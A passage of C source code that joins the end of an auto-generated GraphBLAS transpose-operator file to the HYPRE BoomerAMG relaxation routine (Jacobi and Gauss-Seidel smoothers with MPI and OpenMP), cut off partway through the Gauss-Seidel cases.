GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC32_t
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t x = (*((const GxB_FC32_t *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
GxB_FC32_t
}
#endif
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
GxB_FC32_t aij = GBX (Ax, pA, false) ; \
Cx [pC] = aij ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC32_t y = (*((const GxB_FC32_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
par_relax.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
/******************************************************************************
*
* Relaxation scheme
*
*****************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "Common.h"
#include "_hypre_lapack.h"
#include "../sstruct_ls/gselim.h"
/*--------------------------------------------------------------------------
* hypre_BoomerAMGRelax
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_BoomerAMGRelax( hypre_ParCSRMatrix *A,
hypre_ParVector *f,
HYPRE_Int *cf_marker,
HYPRE_Int relax_type,
HYPRE_Int relax_points,
HYPRE_Real relax_weight,
HYPRE_Real omega,
HYPRE_Real *l1_norms,
hypre_ParVector *u,
hypre_ParVector *Vtemp,
hypre_ParVector *Ztemp )
{
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_Int n = hypre_CSRMatrixNumRows(A_diag);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_BigInt first_ind = hypre_ParVectorFirstIndex(u);
hypre_Vector *u_local = hypre_ParVectorLocalVector(u);
HYPRE_Real *u_data = hypre_VectorData(u_local);
hypre_Vector *f_local = hypre_ParVectorLocalVector(f);
HYPRE_Real *f_data = hypre_VectorData(f_local);
hypre_Vector *Vtemp_local;
HYPRE_Real *Vtemp_data;
if (relax_type != 10)
{
Vtemp_local = hypre_ParVectorLocalVector(Vtemp);
Vtemp_data = hypre_VectorData(Vtemp_local);
}
HYPRE_Real *Vext_data = NULL;
HYPRE_Real *v_buf_data = NULL;
HYPRE_Real *tmp_data;
hypre_Vector *Ztemp_local;
HYPRE_Real *Ztemp_data;
hypre_CSRMatrix *A_CSR;
HYPRE_Int *A_CSR_i;
HYPRE_Int *A_CSR_j;
HYPRE_Real *A_CSR_data;
hypre_Vector *f_vector;
HYPRE_Real *f_vector_data;
HYPRE_Int i, j, jr;
HYPRE_Int ii, jj;
HYPRE_Int ns, ne, size, rest;
HYPRE_Int column;
HYPRE_Int relax_error = 0;
HYPRE_Int num_sends;
HYPRE_Int num_recvs;
HYPRE_Int index, start;
HYPRE_Int num_procs, num_threads, my_id, ip, p;
HYPRE_Int vec_start, vec_len;
hypre_MPI_Status *status;
hypre_MPI_Request *requests;
HYPRE_Real *A_mat;
HYPRE_Real *b_vec;
HYPRE_Real zero = 0.0;
HYPRE_Real res, res0, res2;
HYPRE_Real one_minus_weight;
HYPRE_Real one_minus_omega;
HYPRE_Real prod;
one_minus_weight = 1.0 - relax_weight;
one_minus_omega = 1.0 - omega;
hypre_MPI_Comm_size(comm,&num_procs);
hypre_MPI_Comm_rank(comm,&my_id);
num_threads = hypre_NumThreads();
/*-----------------------------------------------------------------------
* Switch statement to direct control based on relax_type:
* relax_type = 0 -> Jacobi or CF-Jacobi
* relax_type = 1 -> Gauss-Seidel <--- very slow, sequential
* relax_type = 2 -> Gauss_Seidel: interior points in parallel ,
* boundary sequential
* relax_type = 3 -> hybrid: SOR-J mix off-processor, SOR on-processor
* with outer relaxation parameters (forward solve)
* relax_type = 4 -> hybrid: SOR-J mix off-processor, SOR on-processor
* with outer relaxation parameters (backward solve)
* relax_type = 5 -> hybrid: GS-J mix off-processor, chaotic GS on-node
* relax_type = 6 -> hybrid: SSOR-J mix off-processor, SSOR on-processor
* with outer relaxation parameters
* relax_type = 7 -> Jacobi (uses Matvec), only needed in CGNR
* relax_type = 8 -> hybrid L1 Symm. Gauss-Seidel
* relax_type = 10 -> On-processor direct forward solve for matrices with
* triangular structure (indices need not be ordered
* triangular)
* relax_type = 13 -> hybrid L1 Gauss-Seidel forward solve
* relax_type = 14 -> hybrid L1 Gauss-Seidel backward solve
* relax_type = 15 -> CG
* relax_type = 16 -> Scaled Chebyshev
* relax_type = 17 -> FCF-Jacobi
* relax_type = 18 -> L1-Jacobi
* relax_type = 9, 99, 98 -> Direct solve, Gaussian elimination
* relax_type = 19-> Direct Solve, (old version)
* relax_type = 29-> Direct solve: use gaussian elimination & BLAS
* (with pivoting) (old version)
*-----------------------------------------------------------------------*/
switch (relax_type)
{
case 0: /* Weighted Jacobi */
{
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
/* printf("!! Proc %d: n %d, num_sends %d, num_cols_offd %d\n", my_id, n, num_sends, num_cols_offd); */
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
if (num_procs > 1)
{
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_points == 0)
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= one_minus_weight;
u_data[i] += relax_weight * res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= one_minus_weight;
u_data[i] += relax_weight * res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 5: /* Hybrid: Jacobi off-processor,
chaotic Gauss-Seidel on-processor */
{
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
{
v_buf_data[index++] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data, Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_points == 0)
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,jj,res) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
/* Hybrid: Jacobi off-processor, Gauss-Seidel on-processor (forward loop) */
case 3:
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
#if defined(HYPRE_USING_PERSISTENT_COMM)
// JSP: persistent comm can be similarly used for other smoothers
hypre_ParCSRPersistentCommHandle *persistent_comm_handle;
#endif
if (num_procs > 1)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] -= hypre_MPI_Wtime();
#endif
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
#if defined(HYPRE_USING_PERSISTENT_COMM)
persistent_comm_handle = hypre_ParCSRCommPkgGetPersistentCommHandle(1, comm_pkg);
v_buf_data = (HYPRE_Real *) hypre_ParCSRCommHandleSendDataBuffer(persistent_comm_handle);
Vext_data = (HYPRE_Real *) hypre_ParCSRCommHandleRecvDataBuffer(persistent_comm_handle);
#else
v_buf_data = hypre_CTAlloc(HYPRE_Real, hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
#endif
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
HYPRE_Int begin = hypre_ParCSRCommPkgSendMapStart(comm_pkg, 0);
HYPRE_Int end = hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for HYPRE_SMP_SCHEDULE
#endif
for (i = begin; i < end; i++)
{
v_buf_data[i-begin] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,i)];
}
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PACK_UNPACK] += hypre_MPI_Wtime();
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] -= hypre_MPI_Wtime();
#endif
#if defined(HYPRE_USING_PERSISTENT_COMM)
hypre_ParCSRPersistentCommHandleStart(persistent_comm_handle, HYPRE_MEMORY_HOST, v_buf_data);
#else
comm_handle = hypre_ParCSRCommHandleCreate(1, comm_pkg, v_buf_data, Vext_data);
#endif
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
#if defined(HYPRE_USING_PERSISTENT_COMM)
hypre_ParCSRPersistentCommHandleWait(persistent_comm_handle, HYPRE_MEMORY_HOST, Vext_data);
#else
hypre_ParCSRCommHandleDestroy(comm_handle);
#endif
comm_handle = NULL;
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_HALO_EXCHANGE] += hypre_MPI_Wtime();
#endif
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] -= hypre_MPI_Wtime();
#endif
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
#ifndef HYPRE_USING_PERSISTENT_COMM
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
#endif
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] += hypre_MPI_Wtime();
#endif
}
break;
case 1: /* Gauss-Seidel VERY SLOW */
{
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
num_recvs = hypre_ParCSRCommPkgNumRecvs(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
status = hypre_CTAlloc(hypre_MPI_Status, num_recvs+num_sends, HYPRE_MEMORY_HOST);
requests= hypre_CTAlloc(hypre_MPI_Request, num_recvs+num_sends, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
/*
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
} */
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
for (p = 0; p < num_procs; p++)
{
jr = 0;
if (p != my_id)
{
for (i = 0; i < num_sends; i++)
{
ip = hypre_ParCSRCommPkgSendProc(comm_pkg, i);
if (ip == p)
{
vec_start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
vec_len = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1)-vec_start;
for (j=vec_start; j < vec_start+vec_len; j++)
v_buf_data[j] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
hypre_MPI_Isend(&v_buf_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
}
hypre_MPI_Waitall(jr,requests,status);
hypre_MPI_Barrier(comm);
}
else
{
if (num_procs > 1)
{
for (i = 0; i < num_recvs; i++)
{
ip = hypre_ParCSRCommPkgRecvProc(comm_pkg, i);
vec_start = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i);
vec_len = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i+1)-vec_start;
hypre_MPI_Irecv(&Vext_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
hypre_MPI_Waitall(jr,requests,status);
}
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
hypre_MPI_Barrier(comm);
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
hypre_TFree(status, HYPRE_MEMORY_HOST);
hypre_TFree(requests, HYPRE_MEMORY_HOST);
}
}
break;
case 2: /* Gauss-Seidel: relax interior points in parallel, boundary
sequentially */
{
if (num_procs > 1)
{
